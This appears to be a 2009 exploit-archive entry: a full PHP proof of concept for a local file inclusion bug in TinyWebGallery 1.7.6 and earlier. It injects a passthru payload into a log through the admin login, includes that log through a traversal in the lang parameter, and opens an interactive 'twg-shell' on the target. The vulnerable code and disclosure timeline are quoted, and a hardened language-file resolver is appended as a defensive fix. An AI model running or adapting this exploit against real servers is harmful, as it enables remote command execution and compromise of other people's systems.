TinyWebGallery <= 1.7.6 LFI / Remote Code Execution Exploit
Source: n0b0d13s[at]gmail[dot]com  Author: EgiX  Published: 2009-05-09

<?php

/*
 -----------------------------------------------------------
 TinyWebGallery <= 1.7.6 LFI / Remote Code Execution Exploit
 -----------------------------------------------------------
 
 author...: EgiX
 mail.....: n0b0d13s[at]gmail[dot]com
 
 link.....: http://www.tinywebgallery.com/
 details..: this vulnerability derives from QuiXplorer (http://quixplorer.sourceforge.net/)

 This PoC was written for educational purposes. Use it at your own risk.
 The author will not be responsible for any damage.

 [-] vulnerable code in /admin/_include/init.php

 110. // Get Language
 111. if (isset($GLOBALS['__GET']["lang"]))  $GLOBALS["lang"] = $GLOBALS["language"] = $_SESSION["admin_lang"] =  $GLOBALS['__GET']["lang"];
 112. elseif (isset($GLOBALS['__POST']["lang"])) $GLOBALS["lang"] = $GLOBALS["language"] = $_SESSION["admin_lang"] =  $GLOBALS['__POST']["lang"];
 113. else if (isset($_SESSION["admin_lang"])) $GLOBALS["lang"] = $GLOBALS["language"] = $_SESSION["admin_lang"]; 
 114. else $GLOBALS["language"] = $GLOBALS["default_language"];
 115. 
   [...]
 138. 
 139. // ------------------------------------------------------------------------------
 140. // Necessary files
 141. require _QUIXPLORER_PATH . "/_config/conf.php";
 142. 
 143. if (file_exists(_QUIXPLORER_PATH . "/_lang/" . $GLOBALS["language"] . ".php"))
 144.     require _QUIXPLORER_PATH . "/_lang/" . $GLOBALS["language"] . ".php";
 145. else if (file_exists(_QUIXPLORER_PATH . "/_lang/" . $GLOBALS["default_language"] . ".php"))
 146.     require _QUIXPLORER_PATH . "/_lang/" . $GLOBALS["default_language"] . ".php";
 147. else
 148.     require _QUIXPLORER_PATH . "/_lang/en.php";

 An attacker could include arbitrary local files through the require statement at line 144, because the
 $_GET['lang'] parameter isn't properly sanitised. Successful exploitation requires magic_quotes_gpc = off

 [-] Disclosure timeline:
  
 [14/04/2009] - Bug discovered
 [25/04/2009] - Vendor contacted
 [26/04/2009] - Vendor replied
 [26/04/2009] - Fix released: http://www.tinywebgallery.com/forum/viewtopic.php?t=1653
 [08/05/2009] - Public disclosure

*/

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

function http_send($host, $packet)
{
 // socket_create() returns false on failure, so the error must be read from socket_last_error()
 if (($s = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) == false)
   die("\nsocket_create(): " . socket_strerror(socket_last_error()) . "\n");

 if (socket_connect($s, $host, 80) == false)
   die("\nsocket_connect(): " . socket_strerror(socket_last_error()) . "\n");

 socket_write($s, $packet, strlen($packet));
 $response = '';
 while ($m = socket_read($s, 2048)) $response .= $m;

 socket_close($s);
 return $response;
}

function check_target()
{
 global $host, $path;

 $packet  = "GET {$path}info.php?showphpinfo=true HTTP/1.0\r\n";
 $packet .= "Host: {$host}\r\n";
 $packet .= "Connection: close\r\n\r\n";

 preg_match('/magic_quotes_gpc<\/td><td class="v">(.*)<\/td><td/', http_send($host, $packet), $match);

 if ($match[1] != "Off") die("\n[-] Exploit failed...magic_quotes_gpc = on\n");
}

function inject_code()
{
 global $host, $path;

 $code  = "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${die} ?>";
 $payload = "p_user={$code}&p_pass=";

 $packet  = "POST {$path}admin/index.php?action=login HTTP/1.0\r\n";
 $packet .= "Host: {$host}\r\n";
 $packet .= "Content-Length: ".strlen($payload)."\r\n";
 $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
 $packet .= "Connection: close\r\n\r\n";
 $packet .= $payload;

 http_send($host, $packet);
}

print "\n+---------------------------------------------------------------------+";
print "\n| TinyWebGallery <= 1.7.6 LFI / Remote Code Execution Exploit by EgiX |";
print "\n+---------------------------------------------------------------------+\n";

if ($argc < 3)
{
 print "\nUsage......: php $argv[0] host path\n";
 print "\nExample....: php $argv[0] localhost /";
 print "\nExample....: php $argv[0] localhost /twg/\n";
 die();
}

$host = $argv[1];
$path = $argv[2];

check_target();
inject_code();

$packet  = "GET {$path}admin/index.php?lang=../../counter/_twg.log%%00 HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";

while (1)
{
 print "\ntwg-shell# ";
 if (($cmd = trim(fgets(STDIN))) == "exit") break;
 $response = http_send($host, sprintf($packet, base64_encode($cmd)));
 preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
}

?>
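A hardened replacement for the language lookup in admin/_include/init.php (lines 110-148 quoted above), added here as an example (PHP 7+); it is not the vendor's own fix, which is published at the forum link in the disclosure timeline. It allow-lists the language code before it can reach require() and then checks that the resolved file stays inside _lang/, so a value such as ../../counter/_twg.log%00 is rejected regardless of the magic_quotes_gpc setting and regardless of whether it arrived via GET, POST or a previously poisoned session. _QUIXPLORER_PATH, $GLOBALS["default_language"] and an active session are assumed to exist as in the original.

```php
<?php
// Added example, not TinyWebGallery's or QuiXplorer's code: hardened language
// selection for admin/_include/init.php. Assumes _QUIXPLORER_PATH,
// $GLOBALS["default_language"] and session_start() exist as in the original.

function resolve_language_file(string $langDir, ?string $requested, string $default): string
{
    $base = realpath($langDir);
    if ($base === false) {
        throw new RuntimeException("language directory missing: $langDir");
    }

    $candidates = [];
    // Allow-list: only bare codes such as "en" or "de_DE". Anything else
    // ("../../counter/_twg.log\0", absolute paths, URL-encoded junk) is dropped
    // here, before it can ever be concatenated into a require() path.
    if ($requested !== null && preg_match('/^[a-z]{2}(_[A-Z]{2})?$/', $requested) === 1) {
        $candidates[] = $requested;
    }
    $candidates[] = $default;   // same fallback order as the original code
    $candidates[] = 'en';

    foreach (array_unique($candidates) as $code) {
        $real = realpath($base . DIRECTORY_SEPARATOR . $code . '.php');
        // Defence in depth: after symlinks and ".." are resolved, the file must
        // still live directly under _lang/, otherwise it is skipped.
        if ($real !== false && is_file($real)
            && strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) === 0) {
            return $real;
        }
    }
    throw new RuntimeException('no usable language file');
}

// Drop-in usage: validate the code whatever its source, then require the file.
$requested = $_GET['lang'] ?? $_POST['lang'] ?? $_SESSION['admin_lang'] ?? null;
$langFile  = resolve_language_file(_QUIXPLORER_PATH . '/_lang', $requested,
                                   $GLOBALS['default_language']);
// Store only the validated code, so the session can no longer carry a hostile value.
$GLOBALS['lang'] = $GLOBALS['language'] = $_SESSION['admin_lang'] = basename($langFile, '.php');
require $langFile;
```

Because validation happens at the point of use rather than when the value is first stored, an admin_lang value written into the session by an older, vulnerable version of init.php is also neutralised on the next request.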